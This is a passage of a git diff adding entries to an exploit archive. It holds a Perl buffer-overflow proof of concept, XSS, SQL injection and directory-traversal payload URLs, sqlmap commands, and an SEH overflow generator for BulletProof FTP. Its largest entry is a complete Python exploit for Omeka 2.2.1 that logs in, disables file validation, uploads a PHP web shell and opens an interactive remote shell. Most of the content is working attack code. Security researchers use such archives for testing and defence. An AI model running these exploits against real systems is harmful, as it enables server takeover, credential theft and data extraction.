0xfffd28d0fffd2708 +R12: 0x1 +R13: 0x0 +R14: 0x6397a0 --> 0x6f2e25 ('%.o') +R15: 0x0 +EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction +overflow) +[-------------------------------------code-------------------------------------] +0x40cc59: je 0x40cc6b +0x40cc5b: nop DWORD PTR [rax+rax*1+0x0] +0x40cc60: mov rbx,rax +=> 0x40cc63: mov rax,QWORD PTR [rax] <----- Pointer dereferencing +0x40cc66: test rax,rax +0x40cc69: jne 0x40cc60 +0x40cc6b: cmp DWORD PTR [rbp-0x105c],0x1 +0x40cc72: lea rdi,[rbp-0x40] +[------------------------------------stack-------------------------------------] +0000| 0x7fffffff95f0 --> 0x0 +0008| 0x7fffffff95f8 --> 0x0 +0016| 0x7fffffff9600 --> 0x0 +0024| 0x7fffffff9608 --> 0x645e50 --> 0x646630 --> 0x64667b --> +0x5f7266006362696c ('libc') +0032| 0x7fffffff9610 --> 0xffffffdf +0040| 0x7fffffff9618 --> 0x645e58 --> 0x6462f0 --> 0x64a500 --> 0x64a541 +--> 0x5f726600656b616d ('make') +0048| 0x7fffffff9620 --> 0x7ffff7bd01f8 --> 0x645e50 --> 0x646630 --> +0x64667b --> 0x5f7266006362696c ('libc') +0056| 0x7fffffff9628 --> 0x0 +[------------------------------------------------------------------------------] +Legend: code, data, rodata, value +Stopped reason: SIGSEGV +0x000000000040cc63 in ?? () + + + +******************************************************************************************* +******************************************************************************************* +Proof of Concept - Source code +******************************************************************************************* +******************************************************************************************* +=cut + +#!/usr/bin/perl + +use 5.010; +use strict; +use warnings; +say "Please set ulimit value to 1000 before (ulimit -c 1000) "; +sleep 0.5; + + +my $buff = "A"x 4096 ; +my $addr = "\xef\xbe\xad\xde"; +my $make = "./make"; +my $gdb = "gdb --core core"; +my $PAYLOAD= (`perl -e 'print "$buff" . "$addr" '`); + +my $exec= qx($make $PAYLOAD); + +say " Reading Core file GDB "; +sleep 0.5; + +system ($gdb); diff --git a/platforms/multiple/webapps/34165.txt b/platforms/multiple/webapps/34165.txt new file mode 100755 index 000000000..a7d9d467b --- /dev/null +++ b/platforms/multiple/webapps/34165.txt @@ -0,0 +1,92 @@ +# Exploit Title: Stored XSS vulnerability in Zenoss core open source +monitoring system +# Date: 12/05/2014 + +# Exploit author: Dolev Farhi dolev(at)openflare.org + +# Vendor homepage: http://zenoss.com + +# Software Link: http://www.zenoss.com + +# Version: Core 4.2.5-2108 64bit + +# Tested on: Kali Linux + +# Vendor alerted: 12/05/2014 + + # CVE-2014-3738 + + + +Software details: + +================== + +Zenoss (Zenoss Core) is a free and open-source application, server, and +network management platform based on the Zope application server. + +Released under the GNU General Public License (GPL) version 2, Zenoss +Core provides a web interface that + +allows system administrators to monitor availability, +inventory/configuration, performance, and events. + + + +Vulnerability details: Stored XSS Vulnerability + +======================== + +A persistent XSS vulnerability was found in Zenoss core, by creating a +malicious host with the Title any user +browsing + +to the relevant manufacturers page will get a client-side script +executed immediately. + + + + + +Proof of Concept: + + 1. Create a device with with the Title + + + + + 2. Navigate to the Infrastructure -> Manufacturers +page. + + + + 3. pick the name of the manufacturer of the device, e.g. +Intel + + + + 4. select the type of the hardware the device is +assigned to, e.g. GenuineIntel_ Intel(R) Core(TM) i7-2640M CPU _ 2.80GHz + + + + 5. the XSS Executes. + + + + + + + + + + GenuineIntel_ Intel(R) Core(TM) +i7-2640M CPU _ 2.80GHz + + + + + + + diff --git a/platforms/php/remote/34160.txt b/platforms/php/remote/34160.txt new file mode 100755 index 000000000..49ce22bf2 --- /dev/null +++ b/platforms/php/remote/34160.txt @@ -0,0 +1,293 @@ +#!/usr/bin/env python +# +# +# Omeka 2.2.1 Remote Code Execution Exploit +# +# +# Vendor: Omeka Team (CHNM GMU) +# Product web page: http://www.omeka.org +# Affected version: 2.2.1 and 2.2 +# +# Summary: Omeka is a free, flexible, and open source web-publishing +# platform for the display of library, museum, archives, and scholarly +# collections and exhibitions. Its 'five-minute setup' makes launching +# an online exhibition as easy as launching a blog. +# +# Desc: Omeka suffers from an authenticated arbitrary PHP code execution. +# The vulnerability is caused due to the improper verification of +# uploaded files in '/admin/items/add' script thru the 'file[0]' POST +# parameter. This can be exploited to execute arbitrary PHP code by +# uploading a malicious PHP script file that will be stored in +# '/files/original' directory after successfully disabling the file +# validation option (or adding something like 'application/x-php' into the +# allowed MIME types list) and bypassing the rewrite rule in the '.htaccess' +# file with '.php5' extension. +# +# .htaccess fix by vendor: +# ------------------------------------------------------- +# Line 29: -RewriteRule !\.php$ - [C] +# Line 29: +RewriteRule !\.(php[0-9]?|phtml|phps)$ - [C] +# ------------------------------------------------------- +# +# - Role permission for disabling validation and uploading files: Super +# - Role permission for uploading files: Super, Admin +# +# Ref: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5193.php +# +# Tested on: Kali Linux 3.7-trunk-686-pae +# Apache/2.2.22 (Debian) +# PHP 5.4.4-13(apache2handler) +# MySQL 5.5.28 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# +# Zero Science Lab - http://www.zeroscience.mk +# Macedonian Information Security Research And Development Laboratory +# +# +# Advisory ID: ZSL-2014-5194 +# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5194.php +# +# +# 16.07.2014 +# +# + +version = '2.0.0.251' + +import itertools, mimetools, mimetypes +import cookielib, urllib, urllib2, sys +import logging, os, time, datetime, re + +from colorama import Fore, Back, Style, init +from cStringIO import StringIO +from urllib2 import URLError + +init() + +if os.name == 'posix': os.system('clear') +if os.name == 'nt': os.system('cls') +piton = os.path.basename(sys.argv[0]) + +def bannerche(): + print ''' + @---------------------------------------------------------------@ + | | + | Omeka 2.2.1 Remote Code Execution Exploit | + | | + | | + | ID: ZSL-2014-5194 | + | | + | Copyleft (c) 2014, Zero Science Lab | + | | + @---------------------------------------------------------------@ + ''' + if len(sys.argv) < 3: + print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' \n' + print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk omeka\n' + sys.exit() + +bannerche() + +print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET + +host = sys.argv[1] +path = sys.argv[2] + +cj = cookielib.CookieJar() +opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) + +try: + opener.open('http://'+host+'/'+path+'/admin/users/login') +except urllib2.HTTPError, errorzio: + if errorzio.code == 404: + print '\x20\x20[*] Checking path '+'.'*41+Fore.RED+'[ER]'+Fore.RESET + print '\x20\x20[*] '+Fore.YELLOW+'Check your path entry.'+Fore.RESET + print + sys.exit() +except URLError, errorziocvaj: + if errorziocvaj.reason: + print '\x20\x20[*] Checking host '+'.'*41+Fore.RED+'[ER]'+Fore.RESET + print '\x20\x20[*] '+Fore.YELLOW+'Check your hostname entry.'+Fore.RESET + print + sys.exit() + +print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET +print '\x20\x20[*] Login please.' + +username = raw_input('\x20\x20[*] Enter username: ') +password = raw_input('\x20\x20[*] Enter password: ') + +login_data = urllib.urlencode({ + 'username' : username, + 'password' : password, + 'remember' : '0', + 'submit' : 'Log In' + }) + +login = opener.open('http://'+host+'/'+path+'/admin/users/login', login_data) +auth = login.read() +for session in cj: + sessid = session.name + +print '\x20\x20[*] Mapping session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET +ses_chk = re.search(r'%s=\w+' % sessid , str(cj)) +cookie = ses_chk.group(0) +print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET + +if re.search(r'Login information incorrect. Please try again.', auth): + print '\x20\x20[*] Faulty credentials given '+'.'*30+Fore.RED+'[ER]'+Fore.RESET + print + sys.exit() +else: + print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET + +disable_file_validation = urllib.urlencode({ + 'disable_default_file_validation' : '1', + 'submit' : 'Save+Changes' + }) + +opener.open('http://'+host+'/'+path+'/admin/settings/edit-security', disable_file_validation) +print '\x20\x20[*] Disabling file validation '+'.'*29+Fore.GREEN+'[OK]'+Fore.RESET + +class MultiPartForm(object): + + def __init__(self): + self.form_fields = [] + self.files = [] + self.boundary = mimetools.choose_boundary() + return + + def get_content_type(self): + return 'multipart/form-data; boundary=%s' % self.boundary + + def add_field(self, name, value): + self.form_fields.append((name, value)) + return + + def add_file(self, fieldname, filename, fileHandle, mimetype=None): + body = fileHandle.read() + if mimetype is None: + mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream' + self.files.append((fieldname, filename, mimetype, body)) + return + + def __str__(self): + + parts = [] + part_boundary = '--' + self.boundary + + parts.extend( + [ part_boundary, + 'Content-Disposition: form-data; name="%s"' % name, + '', + value, + ] + for name, value in self.form_fields + ) + + parts.extend( + [ part_boundary, + 'Content-Disposition: file; name="%s"; filename="%s"' % \ + (field_name, filename), + 'Content-Type: %s' % content_type, + '', + body, + ] + for field_name, filename, content_type, body in self.files + ) + + flattened = list(itertools.chain(*parts)) + flattened.append('--' + self.boundary + '--') + flattened.append('') + return '\r\n'.join(flattened) + +if __name__ == '__main__': + + form = MultiPartForm() + form.add_field('public', '1') + form.add_field('submit', 'Add Item') + + form.add_file('file[0]', 'thricerbd.php5', + fileHandle=StringIO('\"; passthru($_GET[\'cmd\']); echo \"\"; ?>')) + + request = urllib2.Request('http://'+host+'/'+path+'/admin/items/add') + request.add_header('User-agent', 'joxypoxy 2.0') + body = str(form) + request.add_header('Content-type', form.get_content_type()) + request.add_header('Cookie', cookie) + request.add_header('Content-length', len(body)) + request.add_data(body) + request.get_data() + print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET + checkitemid = urllib2.urlopen(request).read() + itemid = re.search('The item #(\d+)', checkitemid).group(1) + print '\x20\x20[*] Getting item ID '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET + print '\x20\x20[*] Item ID: '+Fore.YELLOW+itemid+Fore.RESET + + +checkfileid = opener.open('http://'+host+'/'+path+'/admin/items/show/'+itemid) +fileid = re.search('/admin/files/show/(\d+)', checkfileid.read()).group(1) +print '\x20\x20[*] Getting file ID '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET +print '\x20\x20[*] File ID: '+Fore.YELLOW+fileid+Fore.RESET + +print '\x20\x20[*] Getting file name '+'.'*37+Fore.GREEN+'[OK]'+Fore.RESET +checkhash = opener.open('http://'+host+'/'+path+'/admin/files/show/'+fileid) +hashfile = re.search('/files/original/(.+?).php5', checkhash.read()).group(1) +print '\x20\x20[*] File name: '+Fore.YELLOW+hashfile+'.php5'+Fore.RESET + +print '\x20\x20[*] Starting logging service '+'.'*30+Fore.GREEN+'[OK]'+Fore.RESET +print '\x20\x20[*] Spawning shell '+'.'*40+Fore.GREEN+'[OK]'+Fore.RESET +time.sleep(1) + +furl = '/files/original/'+hashfile+'.php5' + +print +today = datetime.date.today() +fname = 'omeka-'+today.strftime('%d-%b-%Y')+time.strftime('_%H%M%S')+'.log' +logging.basicConfig(filename=fname,level=logging.DEBUG) + +logging.info(' '+'+'*75) +logging.info(' +') +logging.info(' + Log started: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S')) +logging.info(' + Title: Omeka 2.2.1 Remote Code Execution Exploit') +logging.info(' + Python program executed: '+sys.argv[0]) +logging.info(' + Version: '+version) +logging.info(' + Full query: \''+piton+'\x20'+host+'\x20'+path+'\'') +logging.info(' + Username input: '+username) +logging.info(' + Password input: '+password) +logging.info(' + Vector: '+'http://'+host+'/'+path+furl) +logging.info(' +') +logging.info(' + Advisory ID: ZSL-2014-5194') +logging.info(' + Zero Science Lab - http://www.zeroscience.mk') +logging.info(' +') +logging.info(' '+'+'*75+'\n') + +print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET +raw_input() +while True: + try: + cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET) + execute = opener.open('http://'+host+'/'+path+furl+'?cmd='+urllib.quote(cmd)) + reverse = execute.read() + pattern = re.compile(r'
(.*?)
',re.S|re.M) + + print Style.BRIGHT+Fore.CYAN + cmdout = pattern.match(reverse) + print cmdout.groups()[0].strip() + print Style.RESET_ALL+Fore.RESET + + if cmd.strip() == 'exit': + break + + logging.info('Command executed: '+cmd+'\n\nOutput: \n'+'='*8+'\n\n'+cmdout.groups()[0].strip()+'\n\n'+'-'*60+'\n') + except Exception: + break + +logging.warning('\n\nLog ended: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S')+'\n\nEND OF LOG') +print '\x20\x20[*] Carpe commentarius '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET +print '\x20\x20[*] Log file: '+Fore.YELLOW+fname+Fore.RESET +print + +sys.exit() diff --git a/platforms/php/webapps/34157.txt b/platforms/php/webapps/34157.txt new file mode 100755 index 000000000..98081a008 --- /dev/null +++ b/platforms/php/webapps/34157.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/40941/info + +Firebook is prone to multiple cross-site scripting vulnerabilities and directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials and other harvested information may aid in launching further attacks. + +http://www.example.com/path_to_firebook_admin/?URLproxy=%3Cscript%3Ealert(document.cookie)%3C/script%3E +http://www.example.com/guestbook/index.html?answer=%3Cscript%3Ealert(document.cookie)%3C/script%3E +http://www.example.com/guestbook/index.html?answer=guestbook/guest/file.html;page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E +http://www.example.com/path_to_firebook_admin/?param=1;show=../.htaccess; +http://www.example.com/guestbook/index.html?answer=guestbook/guest/%2E%2E/index.html diff --git a/platforms/php/webapps/34159.txt b/platforms/php/webapps/34159.txt new file mode 100755 index 000000000..043c21296 --- /dev/null +++ b/platforms/php/webapps/34159.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/40964/info + +The Gallery XML Joomla! component is prone to an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database; by using directory-traversal strings to execute local script code in the context of the application, the attacker may be able to obtain sensitive information that may aid in further attacks. + + +http://www.example.com/index.php?option=com_galleryxml&controller=[LFI]&task=catpics&gcatid=1 +http://www.example.com/index.php?option=com_galleryxml&controller=galpic&task=catpics&gcatid=-1 union select 1,2,3,4,5,6,concat(username,char(32),password),8,9,10,11,12 from jos_users -- ' + diff --git a/platforms/php/webapps/34161.txt b/platforms/php/webapps/34161.txt new file mode 100755 index 000000000..7b5df8e58 --- /dev/null +++ b/platforms/php/webapps/34161.txt @@ -0,0 +1,98 @@ +?Wordpress Video Gallery + +###################### +# Exploit Title : Wordpress Video Gallery 2.5 SQL Injection and XSS Vulnerabilities + +# Exploit Author : Claudio Viviani + +# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery + +# Software Link : http://downloads.wordpress.org/plugin/contus-video-gallery.2.5.zip ( Fixed :\ ) + +# Dork Google: inurl:/contus-video-gallery/hdflvplayer/hdplayer.swf + (Click on "Repeat the search with the omitted results included") + +# Date : 2014-07-15 + +# Tested on : Windows 7 / Mozilla Firefox + Windows 7 / sqlmap (0.8-1) + Linux / Mozilla Firefox + Linux / sqlmap 1.0-dev-5b2ded0 + +###################### + +# Vulnerability Disclosure Timeline: + +2014-07-15: Discovered vulnerability +2014-07-16: Vendor Notification (Support e-mail address) +2014-07-17: Vendor Response/Feedback +2014-07-23: Vendor Fix/Patch (same version number 2.5) +2014-07-24: Public Disclosure + +# Description + +Wordpress Video Gallery 2.5 suffers from SQL injection and Cross Site Script vulnerabilities + + +###################### + +# PoC + +# Vulnerablity n°1: + +# SQL Injection 1 (Authentication NOT Required): + +1) Open the browser and connect to url http://VICTIM/wp-content/plugins/contus-video-gallery/myextractXML.php + +2) Copy a video_id number (ex. video_id="1") + +3) sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=myextractXML&vid=1" -p vid + + +[21:02:40] [INFO] GET parameter 'vid' is 'AND boolean-based blind - WHERE or HAVING clause' injectable +... +... +... +[21:03:34] [INFO] GET parameter 'vid' is 'MySQL > 5.0.11 AND time-based blind' injectable + + +# SQL Injection 2 (Authentication Required): + +sqlmap --cookie="INSER_WORDPRESS_COOKIE_HERE" -u "http://VICTIM/wp-admin/admin.php?page=newplaylist&playlistId=1" -p playlistId + +sqlmap --cookie="INSER_WORDPRESS_COOKIE_HERE" -u "http://VICTIM/wp-admin/admin.php?page=newvideo&videoId=1" -p videoId + +###################### + +# Vulnerablity n°2: + +# XSS Reflected Authenticated (/videoads/videoads.php, /video/video.php, /playlist/playlist.php ) + +# PoC: + +POST +Host=VICTIM +User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0 +Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language=it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding=gzip, deflate +Referer=http://VICTIM/wp-admin/admin.php?page=videoads +Cookie=wordpress_b43b255bc018ee66673cd91980a723bf=usertest%7C1405626269%7Ce1559aa048ec23f2ddbb5a40290a3d2e; wp-settings-1=advImgDetails%3Dshow%26libraryContent%3Dupload%26wpfb_adv_uploader%3D1%26editor%3Dtinymce%26uploader%3D1; wp-settings-time-1=1405118515; bLicense54=true; __utma=86855576.2039073811.1404413871.1404413871.1404416567.2; __utmz=86855576.1404413871.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_fid=6EEA54B2DFA4150F-06C135149F70F3D9; wp-settings-time-2=1405287261; wp-settings-2=mfold%3Do%26libraryContent%3Dupload; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-AssetAdmin=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; redux_current_tab=0; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_b43b255bc018ee66673cd91980a723bf=usertest%7C1405626269%7Cd8c8ffae7aa7720d4fb3cb56537b1ea7 +Connection=keep-alive +Content-Type=application/x-www-form-urlencoded +Content-Length=110 +POSTDATA=videoadssearchQuery=&page=videoads&videoadsearchbtn=Search+Video+Ads + + +##################### + +Discovered By : Claudio Viviani + http://www.homelab.it + info@homelab.it + homelabit@protonmail.ch + + https://www.facebook.com/homelabit + https://twitter.com/homelabit + https://plus.google.com/+HomelabIt1/ + +##################### \ No newline at end of file diff --git a/platforms/windows/dos/34151.txt b/platforms/windows/dos/34151.txt new file mode 100755 index 000000000..854dc0654 --- /dev/null +++ b/platforms/windows/dos/34151.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/40885/info + +Adobe SVG Viewer is prone to a remote code-execution vulnerability. + +Attackers can exploit this issue to execute arbitrary code in the context of the application. Failed attacks may cause a denial-of-service condition. + +Adobe SVG Viewer 3.03 is vulnerable; other versions may also be affected. + +http://www.exploit-db.com/sploits/34151.rar \ No newline at end of file diff --git a/platforms/windows/dos/34158.txt b/platforms/windows/dos/34158.txt new file mode 100755 index 000000000..45422d2e2 --- /dev/null +++ b/platforms/windows/dos/34158.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/40945/info + +Chrome Engine 4 is prone to a denial-of-service vulnerability. + +An attacker can exploit this issue to crash the affected server, resulting in denial-of-service conditions. + +Chrome Engine version 4 is vulnerable; other versions may also be affected. + +http://www.exploit-db.com/sploits/34158.zip \ No newline at end of file diff --git a/platforms/windows/dos/34162.py b/platforms/windows/dos/34162.py new file mode 100755 index 000000000..559f86531 --- /dev/null +++ b/platforms/windows/dos/34162.py @@ -0,0 +1,55 @@ +#-----------------------------------------------------------------------------# +# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) # +# Date: Jul 24 2014 # +# Exploit Author: Gabor Seljan # +# Software Link: http://www.bpftp.com/ # +# Version: 2010.75.0.76 # +# Tested on: Windows XP SP3 # +# CVE: CVE-2014-2973 # +#-----------------------------------------------------------------------------# + +''' +(a00.9e4): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=41414141 ebx=41414141 ecx=007ef590 edx=00000000 esi=017a4f6a edi=017a516a +eip=005c005b esp=0012f594 ebp=0012f610 iopl=0 nv up ei pl zr na pe nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 +*** ERROR: Symbol file could not be found. Defaulted to export symbols for bpftpclient.exe - +bpftpclient+0x1c005b: +005c005b f6431c10 test byte ptr [ebx+1Ch],10h ds:0023:4141415d=?? +0:000> !exchain +0012f59c: bpftpclient+1c044e (005c044e) +0012f5a8: bpftpclient+1c046b (005c046b) +0012f618: 43434343 +Invalid exception stack at 42424242 +0:000> g +(a00.9e4): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=00000000 ebx=00000000 ecx=43434343 edx=7c9032bc esi=00000000 edi=00000000 +eip=43434343 esp=0012f1c4 ebp=0012f1e4 iopl=0 nv up ei pl zr na pe nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 +43434343 ?? ??? +''' + +#!/usr/bin/python + +junk1 = b'\x41' * 89 +nSEH = b'\x42' * 4 +SEH = b'\x43' * 4 +junk2 = b'\x44' * 1000 + +sploit = junk1 + nSEH + SEH + junk2 + +try: + print('[+] Creating exploit file...') + f = open('sploit.txt', 'wb') + f.write(sploit) + f.close() + print('[+] Exploit file created successfully!') +except: + print('[!] Error while creating exploit file!') + +print('[+] Use the following as Server Name/IP with any user\'s credentials!') +print(sploit.decode())